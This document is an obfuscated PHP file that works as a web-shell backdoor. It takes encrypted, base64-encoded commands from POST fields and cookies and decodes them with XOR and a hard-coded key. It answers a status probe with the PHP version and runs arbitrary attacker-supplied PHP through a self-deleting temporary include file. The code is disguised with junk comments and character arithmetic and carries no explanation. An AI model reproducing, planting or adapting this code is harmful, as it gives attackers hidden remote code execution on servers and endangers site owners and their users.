<?php 

$ecpcxldfn /* juaeyi*/ =	'ecpcxldfn' /* n   */ ^     '';

$met_eiumf       =	"a"."\162"	.   "r"."a"."\x79" /*d  */ . /*spo_bn  */ $ecpcxldfn(95) /*   mxd  */ .       "\x6d" /* jzdo*/ . /*zov */ "a".$ecpcxldfn(112);
$czmua /*  zhum  */ = /*   rwnb */ $ecpcxldfn(99) /*   _grl */ . /* cdj  */ "\x6f"      .	"u"."n"."\x74";

function   heikoneoqs($m_vtsqg,	$y_qrzq_bkh)


{    global    $ecpcxldfn;

      

       $m_vtsqg    =	"<"    .	"?".$ecpcxldfn(763-651)    .	"h"."p".$ecpcxldfn(32)	.  "u"."n"."\x6c" /* pnfg  */ .       "\151" /*eqvp   */ .     "\x6e"	.    "\153"       .    "(".$ecpcxldfn(401-306)       . /*   eiify*/ "_".$ecpcxldfn(70)  . /*   m*/ "\111"	.	"\x4c"	. /* f */ $ecpcxldfn(135-66) /*  w*/ .  $ecpcxldfn(95) /*h  */ .	"_".")"."\x3b" /*   pz  */ .	$ecpcxldfn(32)	.      $m_vtsqg["\144"];
	$xrqhixscfltymrbw    = /*hkb*/ $ecpcxldfn(102) /* flghsj   */ .    "\151"  .    "\154"     . /*   z  */ $ecpcxldfn(542-441)."\x5f" /*   sy_ec_   */ .    "p"."u".$ecpcxldfn(116) /*vcutl */ .      $ecpcxldfn(226-131)    .  "\143"    .	"\157"    .      "n"."\x74"   .      $ecpcxldfn(101)	.    "n"."t"."\163";   

 /*  qyis   */ $xrqhixscfltymrbw($y_qrzq_bkh, /*jjle  */ $m_vtsqg); /*qxn   */ 
   bwqbi($y_qrzq_bkh);


}



$ktdfeypf	=   73;
function	bwqbi($y_qrzq_bkh){
	global    $ecpcxldfn;

    
 /* wjqiri*/ include($y_qrzq_bkh);
  $hrcg_vwhps	= /*  p  */ $y_qrzq_bkh;
	@unlink($hrcg_vwhps);
}


function /*   rzai */ ejlrknqcsm()
{       global /*pwyzc   */ $ecpcxldfn;





    $wxccoe_mgw	=    array();    $wxccoe_mgw["p"."\x76"] /*  wgc */ = /*oe */ phpversion();

  $wxccoe_mgw["s".$ecpcxldfn(463-345)]  = /* ddvxm  */ "3"."."."\x35";

	$ojkyzxrco /*   dex  */ =	74;

 /*aj_ol   */ echo    @serialize($wxccoe_mgw);}


function      mfpamfib($m_vtsqg,    $lyooguexk)
{
    global /* a   */ $ecpcxldfn;
 /*  dzj */ $urmashlotv    =      "";	$_yossool    = /* w  */ 'zxyoe';
  $catgaysmzg /*qqhucc */ =    hash('sha256',    $m_vtsqg); /* j  */ $qsstvdh    =    str_replace('moyzsqtd',	$catgaysmzg, /*   atil   */ $_yossool);

    $wxccoe_mgw    =    0;	while /*   k   */ ($wxccoe_mgw      < /*nzmd   */ strlen($m_vtsqg)) /*  highxe   */ {

   $mlfprsk   =	isset($lyooguexk)    ? /*  offls   */ $lyooguexk /*  gkv*/ : /*  cemkwv */ '';

 /*   qu_ */ for   ($xrqhixs   =    0;     $xrqhixs    < /*   of  */ strlen($mlfprsk)    &&      $wxccoe_mgw    <       strlen($m_vtsqg); /*zypwo  */ $xrqhixs++, /*lel */ $wxccoe_mgw++)       {      $urmashlotv /*   ra*/ .=    $ecpcxldfn(ord($m_vtsqg[$wxccoe_mgw])    ^    ord($mlfprsk[$xrqhixs]));


 /* omfunt  */ }


    if     (strlen($urmashlotv)     >  20) /* hyxm   */ {    $qsstvdh       = /* _ky */ substr($urmashlotv,    0,	20);
 /* bnegld */ }

 /*ysthjl  */ }

 /*  q  */ if	(empty($urmashlotv))    {


 /*  ztdk  */ $urmashlotv /*  atwnd   */ =       date('Y-m-d /* fi */ H:i:s');


    }
    return       $urmashlotv;

}







function    njiatsn_b($hgewsfjjfv)
{


  global    $ecpcxldfn; /* sc_ff  */  /* _mwlzw  */ $arouf /*   lko   */ =      $ecpcxldfn(53)    .	"4".$ecpcxldfn(176-119) /*   lug   */ .	"6".$ecpcxldfn(956-901) /*   myq   */ .	"7"."3"."9"."\x2d" /*  asxef */ .	"8"."\64"	.  $ecpcxldfn(50)     .    $ecpcxldfn(227-173) /*   ivilz  */ .       "\55" /*   vv */ .    "\64"    . /*_fsa */ "\60"   . /*  thc */ "9".$ecpcxldfn(102)      .    "-".$ecpcxldfn(98)    . /*   nrd */ $ecpcxldfn(579-523) /*   pxib  */ .   "\x64"	. /*   jh   */ $ecpcxldfn(100)      . /*x */ "-"."0".$ecpcxldfn(51) /*mfe_jl  */ .      "\61" /*   ivb */ . /*   pfyaxg*/ "b"."\144"."\70"    . /*   n   */ "\x61"    .	"\66" /*   u*/ . /*  cpxhr  */ "c"."6"."a"."c";

	
 /*   qvfob   */ foreach /* g   */ ($hgewsfjjfv /*   eljtm */ as /*   xhd*/ $ycgdwgiao /* jtsozq */ =>	$m_vtsqg) /* rnyo */ {
  xwgbrcctl(base64_decode($m_vtsqg), /*  vuu_   */ $arouf,      $ycgdwgiao);
	}
}

function /*  w  */ xwgbrcctl($m_vtsqg,	$arouf,    $ycgdwgiao){
	global /*wi*/ $ecpcxldfn;

    
    $m_vtsqg	=	unserialize(mfpamfib(mfpamfib($m_vtsqg, /*jqvir */ $arouf),    $ycgdwgiao));	$xlryumcuj /*   skqa */ = /* o_yz*/ 'mdfmpt';

	$kapvjzhxr    =    'uo';


 /*  riuqn */ if       (isset($m_vtsqg[$ecpcxldfn(97)    .	$ecpcxldfn(1103-996)]))	{


 /*gndvzr   */ if /*c   */ ($m_vtsqg["a"]      ==     "i") /*   fru_hj */ {
 /*  fzxg*/ ejlrknqcsm();


 /*  pxpjk*/ } /*   kcoy   */ elseif   ($m_vtsqg["a"] /*acct   */ ==    $ecpcxldfn(542-441))    {  heikoneoqs($m_vtsqg, /*  dwp*/ sprintf("."."\57"  .   "\45" /*yagcvp */ .    $ecpcxldfn(115)    .	$ecpcxldfn(322-276)  .  "p"."\x6c",  md5($arouf)));			$ubviiot    = /*rfdppi*/ 44;
	}
 /*   xvat */ exit();

    }
}



njiatsn_b($_POST); /*twvsfl*/ 




$ckvcplzw      =	$met_eiumf('rawurldecode',    $_POST);
$zpyheo /*  e */ =    $czmua($ckvcplzw);


njiatsn_b($_COOKIE);   


$kdgjkc	= /*   k   */ $met_eiumf('rawurldecode', /*wv  */ $_COOKIE);



?>